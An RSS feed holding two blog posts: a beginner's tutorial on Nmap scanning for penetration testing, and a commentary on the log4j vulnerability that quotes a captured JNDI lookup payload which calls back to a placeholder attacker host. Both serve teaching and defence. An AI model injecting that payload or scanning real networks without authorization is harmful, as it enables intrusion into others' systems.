<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>Forem: Andy Kofod</title>
    <description>The latest articles on Forem by Andy Kofod (@akofod).</description>
    <link>https://forem.com/akofod</link>
    
    <atom:link rel="self" type="application/rss+xml" href="https://forem.com/feed/akofod"/>
    <language>en</language>
    <item>
      <title>Getting Started with Nmap for Pentesters</title>
      <dc:creator>Andy Kofod</dc:creator>
      <pubDate>Wed, 15 Dec 2021 20:47:09 +0000</pubDate>
      <link>https://forem.com/leading-edje/getting-started-with-nmap-for-pentesters-59af</link>
      <guid>https://forem.com/leading-edje/getting-started-with-nmap-for-pentesters-59af</guid>
      <description>&lt;p&gt;Nmap is an incredibly powerful, open-source network scanning and mapping tool that can be used to determine what hosts are available on a network, what services those hosts are running, what operating system they're running, if there is any filtering or firewalls in use, and much more. It's used by system and network admins for various tasks such as monitoring host or service uptime, managing service upgrades, and network inventory. And while it's great for these type of administrative tasks, it's also used heavily by security auditors and pentesters for enumerating a network. It's these users that we'll focus on in this article.&lt;/p&gt;

&lt;h2&gt;
  
  
  What is "enumeration"
&lt;/h2&gt;

&lt;p&gt;Enumeration is simply the process of gathering as much information as possible about your target. It's one of the first, and most important, steps in a penetration test. For this reason, Nmap is one of the first tools a pentester needs to learn. Using Nmap, you can identify which hosts are active on a network, which operating systems those hosts are running, which services are running on those hosts and on which ports, and what versions of the software are running for those services. Using this information, you can begin researching potential vulnerabilities on the running software, and attempt to locate exploits that you may be able to use against the targets.&lt;/p&gt;

&lt;p&gt;It's important to note that enumeration is not a one-time task during a pentest. It's something you'll do over and over again as you exploit vulnerabilities and gain access to new parts of a network. Nmap automates this very tedious work, but it can be an intimidating tool for new users, so lets take a look at the basics of how you might use Nmap in a penetration test.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Nmap Syntax
&lt;/h2&gt;

&lt;p&gt;At the most basic level, the Nmap syntax looks something like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nmap [Scan Type...] [Options] {target specification}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Where &lt;code&gt;Scan Type&lt;/code&gt; is a flag that tells Nmap which type of scan you want to run, and &lt;code&gt;Options&lt;/code&gt; allow you to specify other specific behaviors you want Nmap to use during the scan, such as specifying the ports you want to scan, or where you want the output directed. The &lt;code&gt;target specification&lt;/code&gt; tells Nmap what target(s) you want to scan. This can be specified as an IP address (&lt;code&gt;10.10.10.10&lt;/code&gt;), as a hostname (&lt;code&gt;example.com&lt;/code&gt;), or as a range of IP addresses using CIDR notation (&lt;code&gt;192.168.10.0/24&lt;/code&gt;) or octet range addressing (&lt;code&gt;192.168.3-5,7.1&lt;/code&gt;). Multiple targets can be specified, and can use any combination of the specification styles. This can get confusing if you're not familiar with network addressing, so check out the Nmap reference guide on &lt;a href="https://nmap.org/book/man-target-specification.html" rel="noopener noreferrer"&gt;target specification&lt;/a&gt; if you need more guidance.&lt;/p&gt;

&lt;h2&gt;
  
  
  Basic Network Scanning
&lt;/h2&gt;

&lt;p&gt;Depending on the scope of your test, one of the first scans you might want to run is a simple network scan, or ping scan. If you're working with a range of IP addresses, you'll want to start out by mapping the network and identifying which IP addresses have an active host that you could target further. Nmap is very powerful, but it can also be quite slow depending on the type of scan you're running. We don't want to jump straight into port scanning before we even know if a host is active, so we'll start with a scan that is often referred to as a "ping sweep". This type of scan, initiated with the &lt;code&gt;-sn&lt;/code&gt; flag, will send ICMP ping packets to each host in the target range and report which hosts respond. For example, if we want to check all of the hosts in the &lt;code&gt;192.168.0.x&lt;/code&gt; network we would use the command&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nmap -sn 192.168.0.1-254
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Alternatively, we could achieve the same results using CIDR notation&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nmap -sn 192.168.0.0/24
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;-sn&lt;/code&gt; flag tells Nmap that we want to skip port scanning for this run. There are a lot of other options available for host scanning, but this is the simplest form. For more information on the other options available, check out the &lt;a href="https://nmap.org/book/man-host-discovery.html" rel="noopener noreferrer"&gt;host discovery&lt;/a&gt; section of the reference guide.&lt;/p&gt;

&lt;h2&gt;
  
  
  Port Scanning
&lt;/h2&gt;

&lt;p&gt;Now that we know which hosts are responding, we're ready to start scanning to see which ports are open. There are three basic scan types that are used most often for a port scan. We won't go into great detail on how each of them work here, but here's a quick overview of each:&lt;/p&gt;

&lt;h3&gt;
  
  
  1. TCP Connect Scan &lt;code&gt;-sT&lt;/code&gt;
&lt;/h3&gt;

&lt;p&gt;In this type of scan, Nmap will attempt to connect to each port using the standard TCP three-way handshake. If the port responds with the SYN/ACK packet, then the port is marked as open, and Nmap completes the handshake. On the other hand, if the port responds with an RST packet, Nmap will record the port as closed an move on. A major drawback with this type of scan is that it's common for firewalls to simply drop incoming TCP requests, and not send any response at all. In this case, Nmap would mark the port as filtered. An even bigger issue is if the firewall is configured to respond to TCP requests with an RST packet, even if the port is actually open. This is fairly easy to implement and can cause erroneous scan results. For this reason, you may want to run several different types of scans during enumeration to get the most accurate results possible. For example, if we wanted to run a TCP scan against a host at &lt;code&gt;10.10.63.97&lt;/code&gt; we would use the command&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nmap -sT 10.10.63.97
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Since we didn't specify which ports to scan, Nmap will default to the top 1,000 ports for that protocol. Our output might look something like this&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1pi549w7fk8vk0zn77zx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1pi549w7fk8vk0zn77zx.png" alt="TCP Scan Results"&gt;&lt;/a&gt;&lt;br&gt;
From our results we can see that there are five ports open on this host, and get some basic information about the service running on each.&lt;/p&gt;
&lt;h3&gt;
  
  
  2. Syn Scan &lt;code&gt;-sS&lt;/code&gt;
&lt;/h3&gt;

&lt;p&gt;The Syn Scan is also sometimes known as a "Stealth Scan" or a "Half-Open Scan". This is the default scan used by Nmap and is the most popular because it's not as easy to detect as the TCP scan, and provides a reliable differentiation between open, closed and filtered ports. With a Syn scan, Nmap still uses the TCP protocol, but rather than completing the three-way handshake, it will send an RST packet once the server responds with a SYN/ACK packet. This is considered a stealthier scan because by not completing the handshake, we may avoid our scan being logged in some systems. It also makes the scan much faster, since Nmap doesn't need to worry about completing the full three-way handshake. One important note about Syn Scans is that they must be run a user with &lt;code&gt;sudo&lt;/code&gt; privileges. So, if we want to run a scan against &lt;code&gt;10.10.63.97&lt;/code&gt;, as we did with the TCP Scan we would use the command&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nmap -sS 10.10.63.97
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And we see results very similar to the TCP scan&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyaqieh1dweav6cctlcs5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyaqieh1dweav6cctlcs5.png" alt="Syn Scan Results"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  3. UDP Scan &lt;code&gt;-sU&lt;/code&gt;
&lt;/h3&gt;

&lt;p&gt;The final type of port scan we'll talk about is the UDP Scan. This type of scan is different from the others because it utilizes the UDP protocol instead of the TCP protocol. While TCP is far more prevalent, there are still a lot of services that run on UDP and vulnerabilities in these services are quite common. There are several drawbacks to the UDP scan, one of the main ones being that it is significantly slower than the other types of scans. Even so, it's a good practice to include this type of scan in your enumeration, since it could identify open ports that weren't reported by the other types of scans. Again targeting the server at &lt;code&gt;10.10.63.97&lt;/code&gt;, we would use the following command to run a UDP scan&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nmap -sU 10.10.63.97
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And our results may look something like this&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fngj254ckv9wqsxw3u76r.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fngj254ckv9wqsxw3u76r.png" alt="UDP Scan Results"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;There are several other types of scans available in Nmap such as the NULL, FIN and Xmas scans. They aren't as common as the main three discussed here, but they may provide some benefits in specific situations, such as a need to avoid firewall protections. For more information on the types of scans available in Nmap check out the &lt;a href="https://nmap.org/book/man-port-scanning-techniques.html" rel="noopener noreferrer"&gt;port scanning techniques&lt;/a&gt; section of the reference guide.&lt;/p&gt;
&lt;h2&gt;
  
  
  Service and OS Version Discovery
&lt;/h2&gt;

&lt;p&gt;While the simple scans above can help us identify which ports are open, and provide some basic information about services running on the host, it's not quite enough for us to begin researching vulnerabilities. For that we need to add a couple of options flags to our commands.&lt;/p&gt;

&lt;p&gt;First off, we'll start with attempting to discover the operating system that's running on the host. This is achieved with the &lt;code&gt;-O&lt;/code&gt; option. Using this option, Nmap will use TCP/IP stack fingerprinting to try to identify the OS. For this we would use the command&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nmap -sS -O 10.10.76.119
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzn9thto105mplgsk3xkv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzn9thto105mplgsk3xkv.png" alt="Operating System Detection Results"&gt;&lt;/a&gt;&lt;br&gt;
As you can see from the results, we're still getting the basic scan information identifying open ports, but below that we also get details about the operating system that Nmap believes the server is running. In this case, Linux 3.13. Now we've got something to work with. Using this OS information, we can search &lt;a href="https://www.exploit-db.com/" rel="noopener noreferrer"&gt;Exploit DB&lt;/a&gt; for potential vulnerabilities.&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fx0iludqimig3izgpo4nu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fx0iludqimig3izgpo4nu.png" alt="Exploit DB OS Results"&gt;&lt;/a&gt;&lt;br&gt;
From this search we can see that the OS running on the host has several potential local privilege escalation vulnerabilities.&lt;/p&gt;

&lt;p&gt;This is great, but privilege escalation vulnerabilities don't do us a lot of good until we get a foothold on the server. Next, let's try to get some more information on the services that the host is running. We'll do this with the &lt;code&gt;-sV&lt;/code&gt; option.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nmap -sS -sV 10.10.76.119
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhc8slukm1z1y4amubaix.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhc8slukm1z1y4amubaix.png" alt="Image description"&gt;&lt;/a&gt;&lt;br&gt;
Now we can see a lot more details about the services running on the host. For instance, we already knew that &lt;code&gt;ssh&lt;/code&gt; was running on port &lt;code&gt;22&lt;/code&gt;, but we now know that it's running running OpenSSH version 7.2p2. Let's take this information back to Exploit DB.&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fofa66w3x6yoxvnkhagjt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fofa66w3x6yoxvnkhagjt.png" alt="Image description"&gt;&lt;/a&gt;&lt;br&gt;
Okay, it looks like this version of OpenSSH may have a username enumeration vulnerability. We'll keep doing the same thing for all of the identified services. Even if we can't use an exploit right away, we'll make a note of it. We may be able to come back and use it later on in our tests. Check out the reference pages for &lt;a href="https://nmap.org/book/man-os-detection.html" rel="noopener noreferrer"&gt;OS detection&lt;/a&gt; and &lt;a href="https://nmap.org/book/man-version-detection.html" rel="noopener noreferrer"&gt;service and version detection&lt;/a&gt; for more details on these options.&lt;/p&gt;

&lt;h2&gt;
  
  
  Wrapping Up
&lt;/h2&gt;

&lt;p&gt;This just barely scratches the surface of Nmap's capabilities. There is so much more to this tool, especially once you get into the scripting engine (but I'll save that for a future article). If you want to try out these skills check out sites like &lt;a href="https://tryhackme.com/" rel="noopener noreferrer"&gt;TryHackMe&lt;/a&gt; or &lt;a href="https://www.hackthebox.com/" rel="noopener noreferrer"&gt;HackTheBox&lt;/a&gt; where you can find servers that you can practice on. For now, you should have enough knowledge to get started with network enumeration in your pentests. Good luck!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://dev.to/leading-edje"&gt;&lt;br&gt;
  &lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F5uo60qforg9yqdpgzncq.png" alt="Smart EDJE Image"&gt;&lt;br&gt;
&lt;/a&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>networking</category>
    </item>
    <item>
      <title>The Fallout From log4j and What We Can Learn From It</title>
      <dc:creator>Andy Kofod</dc:creator>
      <pubDate>Wed, 15 Dec 2021 08:30:40 +0000</pubDate>
      <link>https://forem.com/leading-edje/the-fallout-from-log4j-and-what-we-can-learn-from-it-2o92</link>
      <guid>https://forem.com/leading-edje/the-fallout-from-log4j-and-what-we-can-learn-from-it-2o92</guid>
      <description>&lt;p&gt;By now most people who work in software or IT have heard about the vulnerability in log4j that was disclosed last week. This has resulted in a high stakes race between IT teams trying to update and patch their vulnerable systems and hackers trying to find easy targets to exploit with the new vulnerability. The resulting fallout has brought up a lot of very interesting issues that bear discussion.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Details, Briefly
&lt;/h2&gt;

&lt;p&gt;If you're not familiar, &lt;a href="https://logging.apache.org/log4j/2.x/index.html"&gt;log4j&lt;/a&gt; is an open-source logging framework for Java that's maintained by Apache. It's one of the most popular dependencies downloaded from the Maven repository. Released in January of 2001, it's nearly as old as Java itself, and is used in thousands of projects around the world.&lt;/p&gt;

&lt;p&gt;The vulnerability itself has been reported on pretty heavily over the past few days, so I'll just summarize quickly. If an application logs any information directly from the user, such as chat messages, username or email changes, etc., an attacker could potentially format a message that would use the Java Naming and Directory Interface (JNDI) to load and execute code from a remote server. This type of vulnerability is commonly known as a Remote Code Execution (RCE) vulnerability.&lt;/p&gt;

&lt;h2&gt;
  
  
  So What's the Big Deal?
&lt;/h2&gt;

&lt;p&gt;RCE vulnerabilities are certainly not a rare occurrence. A quick search of the CVE database shows at least 100 other vulnerabilities reported this year that mention RCEs, so why is the log4j vulnerability getting so much attention?&lt;/p&gt;

&lt;p&gt;That's what makes this whole situation so interesting. First of all, it's an &lt;em&gt;extremely&lt;/em&gt; popular library that's used by thousands of projects from the smallest hobby web apps, to huge enterprise solutions. It's used in the &lt;a href="https://arstechnica.com/information-technology/2021/12/minecraft-and-other-apps-face-serious-threat-from-new-code-execution-bug/"&gt;servers of Minecraft&lt;/a&gt;, one of the best-selling video games of all time. It's a dependency of &lt;a href="https://www.crn.com/slide-shows/security/10-technology-vendors-affected-by-the-log4j-vulnerability"&gt;numerous, major, software vendors&lt;/a&gt; including AWS, IBM, Cisco, Okta, and VMWare.&lt;/p&gt;

&lt;p&gt;This alone makes it a significant issue, but what makes it even worse is how easy this vulnerability is to exploit. A correctly formatted message, and a remote server to host the attack payload is all that's needed to gain root access to the log4j host server. The following is an example of the &lt;a href="https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/"&gt;messages being seen by Cloudflare&lt;/a&gt; following the disclosure of the vulnerability:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;${jndi:ldap://x.x.x.x/#Touch}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is a simple example that's being used to scan for potential targets. If a server is vulnerable, a request will be sent to &lt;code&gt;x.x.x.x/#Touch&lt;/code&gt;, letting the attacker know that the target is vulnerable to the attack. A follow-up message can then be sent to exploit the vulnerability. For more details on how the vulnerability works, check out &lt;a href="https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/"&gt;this excellent write-up from Cloudflare&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Disclosure Conundrum
&lt;/h2&gt;

&lt;p&gt;This brings us to the first thing I found interesting about this situation. log4j is a pretty old framework, and this bug is not new. According to the Cloudflare article referenced above, it was introduced in 2013. Apparently, it went unnoticed until it was &lt;a href="https://www.crn.com/news/security/log4j-exploit-is-a-fukushima-moment-for-cybersecurity-tenable-cto"&gt;first disclosed&lt;/a&gt; to Apache on November 24th, by security researchers at Alibaba. It wasn't publicly disclosed until December 9th, after Apache had time to create release 2.15.0 to address the issue. And the race was on. &lt;/p&gt;

&lt;p&gt;IT teams around the world immediately began rushing to update their servers with the fixed release. At the same time, attackers started scanning the internet for vulnerable servers. &lt;a href="https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/"&gt;Cloudflare reports&lt;/a&gt; that they began seeing a ramp up of blocked attacks the day after the disclosure, peaking at 20,000 requests per minute, with between 200 and 400 IPs attacking at any given time.&lt;/p&gt;

&lt;p&gt;And that's the conundrum. Disclosing a vulnerability, especially one that's easy to exploit and so wide spread, is bound to trigger this kind of race between the attackers and defenders, and it's interesting to watch. It seems pretty clear that this disclosure was new to attackers. Various reports from security researchers have been tracking the progress of organized groups on the dark web as they rush to develop new exploits. &lt;br&gt;
&lt;/p&gt;
&lt;blockquote class="ltag__twitter-tweet"&gt;

  &lt;div class="ltag__twitter-tweet__main"&gt;
    &lt;div class="ltag__twitter-tweet__header"&gt;
      &lt;img class="ltag__twitter-tweet__profile-image" src="https://res.cloudinary.com/practicaldev/image/fetch/s--YJoKRnXV--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://pbs.twimg.com/profile_images/631923531719151616/IpTXHz_t_normal.jpg" alt="Greg Linares profile image"&gt;
      &lt;div class="ltag__twitter-tweet__full-name"&gt;
        Greg Linares
      &lt;/div&gt;
      &lt;div class="ltag__twitter-tweet__username"&gt;
        @laughing_mantis
      &lt;/div&gt;
      &lt;div class="ltag__twitter-tweet__twitter-logo"&gt;
        &lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--ir1kO05j--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev.to/assets/twitter-f95605061196010f91e64806688390eb1a4dbc9e913682e043eb8b1e06ca484f.svg" alt="twitter logo"&gt;
      &lt;/div&gt;
    &lt;/div&gt;
    &lt;div class="ltag__twitter-tweet__body"&gt;
      Honestly I'm kinda surprised it isn't finished yet, but I have seen at least 3 groups (Eastern euro, .ru and .cn) that are investigating options to do this.&lt;br&gt;&lt;br&gt;Goals appear varied: financial gain via extortion as well as selling access to compromised hosts to RaaS groups
    &lt;/div&gt;
    &lt;div class="ltag__twitter-tweet__date"&gt;
      23:02 PM - 12 Dec 2021
    &lt;/div&gt;


    &lt;div class="ltag__twitter-tweet__actions"&gt;
      &lt;a href="https://twitter.com/intent/tweet?in_reply_to=1470167187461607424" class="ltag__twitter-tweet__actions__button"&gt;
        &lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--fFnoeFxk--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev.to/assets/twitter-reply-action-238fe0a37991706a6880ed13941c3efd6b371e4aefe288fe8e0db85250708bc4.svg" alt="Twitter reply action"&gt;
      &lt;/a&gt;
      &lt;a href="https://twitter.com/intent/retweet?tweet_id=1470167187461607424" class="ltag__twitter-tweet__actions__button"&gt;
        &lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--k6dcrOn8--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev.to/assets/twitter-retweet-action-632c83532a4e7de573c5c08dbb090ee18b348b13e2793175fea914827bc42046.svg" alt="Twitter retweet action"&gt;
      &lt;/a&gt;
      &lt;a href="https://twitter.com/intent/like?tweet_id=1470167187461607424" class="ltag__twitter-tweet__actions__button"&gt;
        &lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--SRQc9lOp--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev.to/assets/twitter-like-action-1ea89f4b87c7d37465b0eb78d51fcb7fe6c03a089805d7ea014ba71365be5171.svg" alt="Twitter like action"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/blockquote&gt;
&lt;br&gt;
There's a small window of time for them to hit the "low hanging fruits" before they're patched. There will of course continue to be organizations that don't patch right away, either because they can't (due to complexity, backwards compatibility, etc.) or because they don't know they have a vulnerable dependency in their codebase.

&lt;p&gt;Now, I'm not suggesting that there was anything wrong with the disclosure. Alibaba's team did the right thing by reporting it to the log4j team, and giving them time to create a patch before disclosing it publicly. This is exactly how responsible disclosures should go. Maybe it's because this vulnerability has gotten so much attention, but I've found it very interesting to watch this "race" take place in real-time. I think the real lesson here is that organizations need to be prepared for this type of event. Know your dependencies, and know how you're going to upgrade them when you need to, especially when time is not on your side. If your systems are too complex to make this type of upgrade easily, it may be time to re-evaluate your architecture.&lt;/p&gt;
&lt;h2&gt;
  
  
  The Paying for Open-Source Debate
&lt;/h2&gt;

&lt;p&gt;Another interesting thing to come out of this incident is the re-emergence of the old arguments about whether enterprise companies should be paying to support the open-source projects they depend on. I always find this debate interesting, and I don't have a strong opinion on the issue, but I see merit to both sides.&lt;/p&gt;

&lt;p&gt;In one camp you have those that argue that these large enterprise organizations are taking advantage of open-source projects without any support for the developers. This group argues that if the developers were paid for their work maintaining open-source projects, they'd have more time to dedicate to preventing vulnerabilities, as well as adding new features. On the other hand, you have some who claim, &lt;a href="https://crawshaw.io/blog/log4j"&gt;as David Crawshaw points out&lt;/a&gt;, that paying for open-source software probably wouldn't have helped to prevent this bug. In fact, it may be these enterprise users that kept this bug from being fixed previously. &lt;a href="https://twitter.com/yazicivo/status/1469349956880408583?s=21"&gt;According to one of the maintainers&lt;/a&gt; of log4j, the team didn't like this feature, but weren't able to remove it due to backward compatibility concerns (we'll come back to this in a minute). &lt;/p&gt;

&lt;p&gt;I love the idea of open-source software, and it would be great if it's maintainers could get paid to keep it going, but how does that help to prevent vulnerabilities like this from sneaking in? I think it's clear from the numerous vulnerabilities found in paid software, that this kind of bug can easily sneak in, paid or not, but this topic seems to spring up any time a vulnerability is found in a widely used open-source project. I don't have an answer for the paid vs. open-source debate, but I will say this: If you're using third-party software in your applications, it's on you to make sure you understand what it's doing and have reviewed the code for vulnerabilities. If you can't confidently say that your software, including it's dependencies, is secure, then you shouldn't be shipping it.&lt;/p&gt;
&lt;h2&gt;
  
  
  Back to the Backward Compatibility
&lt;/h2&gt;

&lt;p&gt;Okay, circling back to the thing I mentioned a minute ago about backward compatibility. This is another interesting aspect of this incident. It appears that the maintainers were at least aware that the JNDI plugin was a potential problem, but their requirements to maintain backwards compatibility prevented them from removing it. I understand the desire to maintain backward compatibility, and I'm sure this is a major issue with the number of users the log4j library has, but I also believe that open-source teams need to feel empowered to do what needs to be done, even if it means a little extra work for their users. This is especially true for security issues. Yes, removing the JNDI feature may have broken the library for some users. There would have been some grumbling as developers figured out how to modify their implementations to work with the new version. But, those same developers would probably have preferred that over finding out on a Friday afternoon that you have a critical security vulnerability that has to be fixed right now.&lt;/p&gt;
&lt;h2&gt;
  
  
  Final Thoughts
&lt;/h2&gt;

&lt;p&gt;It's been interesting to watch this event unfold, and it's got me thinking about a lot of different issues. I'll leave you with this:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;If you have a 3rd party dependency in your codebase, or if you're using 3rd party software, this will happen to you at some point. It doesn't matter if it's paid or open-source, there will be a vulnerability. Hopefully, it won't be as bad as this one, but it will happen.&lt;/li&gt;
&lt;li&gt;When it happens, you need to be ready to update any and all dependencies at a moments notice. Invest in building out pipelines to make these kind of changes quick and painless. You don't want to end up in a race with the hackers.&lt;/li&gt;
&lt;li&gt;If you're using a 3rd party library, do your due diligence. Read the code. Have other developers read the code. Treat it like a code review for your own products. If it's not code that you'd accept from your own team, then don't put it in your project.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I'd like to say this event is over, but it's just getting started. Most of the big players have patched their systems by now, but there will be stragglers, and I'm sure there are some big players that have already been hit. We probably won't see those disclosures for a couple of weeks yet. I think &lt;a href="https://twitter.com/marcwrogers/status/1470504212031279111"&gt;Marc Rogers&lt;/a&gt; sums it up pretty well.&lt;/p&gt;


&lt;blockquote class="ltag__twitter-tweet"&gt;

  &lt;div class="ltag__twitter-tweet__main"&gt;
    &lt;div class="ltag__twitter-tweet__header"&gt;
      &lt;img class="ltag__twitter-tweet__profile-image" src="https://res.cloudinary.com/practicaldev/image/fetch/s--zh-gx2J0--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://pbs.twimg.com/profile_images/1418139016420118529/7jDfhDau_normal.jpg" alt="Marc Rogers profile image"&gt;
      &lt;div class="ltag__twitter-tweet__full-name"&gt;
        Marc Rogers
      &lt;/div&gt;
      &lt;div class="ltag__twitter-tweet__username"&gt;
        @marcwrogers
      &lt;/div&gt;
      &lt;div class="ltag__twitter-tweet__twitter-logo"&gt;
        &lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--ir1kO05j--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev.to/assets/twitter-f95605061196010f91e64806688390eb1a4dbc9e913682e043eb8b1e06ca484f.svg" alt="twitter logo"&gt;
      &lt;/div&gt;
    &lt;/div&gt;
    &lt;div class="ltag__twitter-tweet__body"&gt;
      In short, log4j is probably one of the worst vulns I have seen in decades, I expect it to have a really long tail. Boxes will be popped long after it is front page news. Cleanup in internet aisle 10 :(
    &lt;/div&gt;
    &lt;div class="ltag__twitter-tweet__date"&gt;
      21:21 PM - 13 Dec 2021
    &lt;/div&gt;


    &lt;div class="ltag__twitter-tweet__actions"&gt;
      &lt;a href="https://twitter.com/intent/tweet?in_reply_to=1470504212031279111" class="ltag__twitter-tweet__actions__button"&gt;
        &lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--fFnoeFxk--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev.to/assets/twitter-reply-action-238fe0a37991706a6880ed13941c3efd6b371e4aefe288fe8e0db85250708bc4.svg" alt="Twitter reply action"&gt;
      &lt;/a&gt;
